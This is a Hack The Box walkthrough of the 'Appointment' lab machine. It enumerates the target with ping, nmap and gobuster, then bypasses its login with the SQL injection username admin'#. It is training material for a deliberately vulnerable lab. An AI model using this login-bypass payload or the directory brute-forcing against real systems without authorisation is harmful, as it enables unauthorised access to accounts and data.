---
sidebar_position: 1
sidebar_label: ⌚ Appointment
description: This is my first Tier 1 Machine, It’s very interesting how we can access, using SQL Injection.
last_update:
  date: 2022/06/09
  author: Raúl Sánchez
tags:
  - Gobuster
  - SQLi
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Appointment

> This is my first Tier 1 Machine, It’s very interesting how we can access, using SQL Injection.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Appointment Machine](appointment1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.191.227`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.191.227
PING 10.129.191.227 (10.129.191.227) 56(84) bytes of data.
64 bytes from 10.129.191.227: icmp_seq=1 ttl=63 time=53.2 ms

--- 10.129.191.227 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 53.155/53.155/53.155/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.191.227

10.129.191.227 (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.

```python
❯ nmap -sV 10.129.191.227
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 19:01 CEST
Nmap scan report for 10.129.191.227
Host is up (0.055s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
```

We observe that port 80/tcp is open. Which is running the [**Apache**](https://apache.org/) httpd server version 2.4.38.

:::note
**Apache** HTTP Server is a free and open-source application that runs web pages on either physical or virtual web servers.
:::

## 2. Foothold

Now, we are going to use [gobuster](https://www.kali.org/tools/gobuster/) which will brute-force the directories and files provided in the wordlist of our choice. Install it if you don't have it alredy.

```bash
sudo apt install gobuster
```

After that, we can scan the directories of the web page properly using Gobuster to its full capabilities. The flags we will be using with this command are as follows:

* dir : Specify that we wish to do web directory enumeration.&#x20;
* \-u : Specify the web address of the target machine that runs the HTTP server.&#x20;
* \--wordlist : Specify the wordlist that we want to use.

```python
❯ gobuster dir -u http://10.129.191.227/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.191.227/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/09 19:13:27 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://10.129.191.227/images/]
/css                  (Status: 301) [Size: 314] [--> http://10.129.191.227/css/]   
/js                   (Status: 301) [Size: 313] [--> http://10.129.191.227/js/]    
/vendor               (Status: 301) [Size: 317] [--> http://10.129.191.227/vendor/]
/fonts                (Status: 301) [Size: 316] [--> http://10.129.191.227/fonts/] 
                                                                                   
===============================================================
2022/06/09 19:23:27 Finished
===============================================================
```

After checking out the web directories, we have found no helpful information. So we have to look for another way, let's try SQL injection. Use the user `admin'#` and so the query that the server makes is the following. Look how after the `#` symbol, everything turns into a comment

```sql
'SELECT * FROM users WHERE username = admin'# AND password is A'
```

This is due to a lack of input validation in the PHP code shown above.

![Login to the webpage of the target](appointment2.png)

After pressing the log-in button, the exploit code is sent, and as suspected, we are presented with the following page:

![Flag](appointment3.png)